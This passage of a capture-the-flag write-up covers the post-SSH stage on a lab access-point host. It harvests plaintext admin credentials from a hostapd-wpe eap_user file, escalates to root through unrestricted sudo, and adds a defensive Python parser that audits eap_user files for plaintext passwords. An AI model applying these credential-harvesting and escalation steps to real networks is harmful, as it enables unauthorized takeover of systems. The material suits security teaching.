wlan6            UP             10.10.10.38/24 fe80::ff:fe00:600/64

root@AirTouch-Consultant:~# ssh remote@10.10.10.1
The authenticity of host '10.10.10.1 (10.10.10.1)' can't be established.
ECDSA key fingerprint is SHA256:/lSCXr95A71FBCcQ9DT1xXMFeCAsLEnCUfSwu/3qPoE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.1' (ECDSA) to the list of known hosts.
remote@10.10.10.1's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

remote@AirTouch-AP-MGT:~$ id
uid=1000(remote) gid=1000(remote) groups=1000(remote)

remote@AirTouch-AP-MGT:~$ ls /home
admin  remote

Now we're inside AirTouch-AP-MGT, the AP management host — and we can already see the next target user: admin.

4.5 Hostapd EAP

Enumerate running processes:

axura @ labyrinth :~
remote@AirTouch-AP-MGT:/tmp$ ps axu
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2608   592 ?        Ss   Jan18   0:00 /bin/sh -c service ssh start && tail -f /dev/null
root          14  0.0  0.1  12188  4228 ?        Ss   Jan18   0:06 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
root          15  0.0  0.0   2544   576 ?        S    Jan18   0:03 tail -f /dev/null
root          27  0.0  0.0   3976  2964 ?        Ss   Jan18   0:00 bash /root/start.sh
root          45  0.0  0.1  10712  7936 ?        S    Jan18   1:13 hostapd_aps /root/mgt/hostapd_wpe.conf
root          46  0.0  0.1  10572  7836 ?        S    Jan18   0:47 hostapd_aps /root/mgt/hostapd_wpe2.conf
root          63  0.0  0.0   9300  3572 ?        S    Jan18   0:00 dnsmasq -d
root      286118  0.0  0.2  13912  9076 ?        Ss   12:28   0:00 sshd: remote [priv]
remote    286194  0.0  0.1  13912  5252 ?        R    12:29   0:00 sshd: remote@pts/0
remote    286195  0.0  0.0   4240  3556 pts/0    Ss   12:29   0:00 -bash
remote    289098  0.0  0.0   5892  2868 pts/0    R+   12:44   0:00 ps axu

We immediately spot the enterprise stack running:

  • hostapd_aps /root/mgt/hostapd_wpe.conf
  • hostapd_aps /root/mgt/hostapd_wpe2.conf
  • dnsmasq -d

4.5.1 Hostapd 101

hostapd, aka Host Access Point Daemon, is the Linux service that turns a WiFi interface into an Access Point.

In this setup:

  • AirTouch-Internet = WPA2-PSK
  • AirTouch-Office = WPA2-Enterprise (802.1X / PEAP)

4.5.2 Hostapd User Database

LinPEAS points to the real gold:

/etc/hostapd/hostapd_wpe.eap_user is literally the phase-2 credential database used inside PEAP:

INI
# hostapd user database for integrated EAP server

[ ... snip ...]

# WPE - DO NOT REMOVE - These entries are specifically in here
*       PEAP,TTLS,TLS,FAST
#"t"    TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "t"     [2]

*       PEAP,TTLS,TLS,FAST [ver=1]
#"t"    GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]

"AirTouch\r4ulcl"       MSCHAPV2        "laboratory" [2]
"admin"                 MSCHAPV2        "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]

This is the local authentication DB for WPA-Enterprise:

  • MSCHAPv2 = the inner "username/password" auth used inside PEAP tunnel
  • [2] = phase2 (inside encrypted PEAP tunnel), i.e. the real login

So admin / xMJpzXt4D9ouMuL3JJsMriF7KZozm7 — we have gone from a low-privileged user to admin creds in plaintext.
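As an added example (not from the page or from hostapd), a parser for the eap_user format above plus an audit that flags phase-2 entries whose passwords sit in the file in the clear; the sample database is constructed from the entries shown, with one extra entry in hostapd's `hash:` NT-hash form under a placeholder identity.

```python
import re

# Entry shape in hostapd.eap_user: identity  methods  [password]  [phase]
ENTRY = re.compile(
    r'^(\*|"[^"]*")\s+(\S+)(?:\s+("[^"]*"|hash:[0-9a-fA-F]{32}))?(?:\s+\[([^\]]+)\])?\s*$'
)

# Constructed sample with the shape of the hostapd_wpe.eap_user shown above
# (page values for the two accounts, plus one entry already converted to an NT-hash placeholder)
SAMPLE_EAP_USER = r'''
# hostapd user database for integrated EAP server
*       PEAP,TTLS,TLS,FAST
*       PEAP,TTLS,TLS,FAST [ver=1]
"AirTouch\r4ulcl"       MSCHAPV2        "laboratory" [2]
"admin"                 MSCHAPV2        "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
"svc-example"           MSCHAPV2        hash:00000000000000000000000000000000 [2]
'''


def parse_eap_user(text):
    """Parse hostapd.eap_user into (identity, methods, password, phase) tuples."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = ENTRY.match(line)
        if not m:
            raise ValueError(f"unparsed eap_user line: {line}")
        identity, methods, password, tag = m.groups()
        phase = 2 if tag == "2" else 1
        entries.append((identity.strip('"'), methods.split(","), password, phase))
    return entries


def audit_eap_user(text):
    """Flag phase-2 entries whose password is stored in the clear, and wildcard phase-2 users.

    hostapd accepts the NT hash form `hash:<32 hex>` for MSCHAPV2; that keeps the
    plaintext out of the file, although the hash itself still has to be protected."""
    findings = []
    for identity, methods, password, phase in parse_eap_user(text):
        if phase != 2:
            continue  # phase-1 wildcard entries only select the outer tunnel method
        if identity == "*":
            findings.append("wildcard identity in phase 2")
        if password is not None and password.startswith('"'):
            findings.append(f"plaintext password for {identity} ({','.join(methods)})")
    return findings
```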

Switch user, check privileges, and escalate:

axura @ labyrinth :~
remote@AirTouch-AP-MGT:/tmp$ su admin
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@AirTouch-AP-MGT:/tmp$ sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on AirTouch-AP-MGT:
    (ALL) ALL
    (ALL) NOPASSWD: ALL
    
admin@AirTouch-AP-MGT:/tmp$ sudo su

root@AirTouch-AP-MGT:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

root@AirTouch-AP-MGT:/tmp# cat /root/root.txt
39******************************e8

Rooted.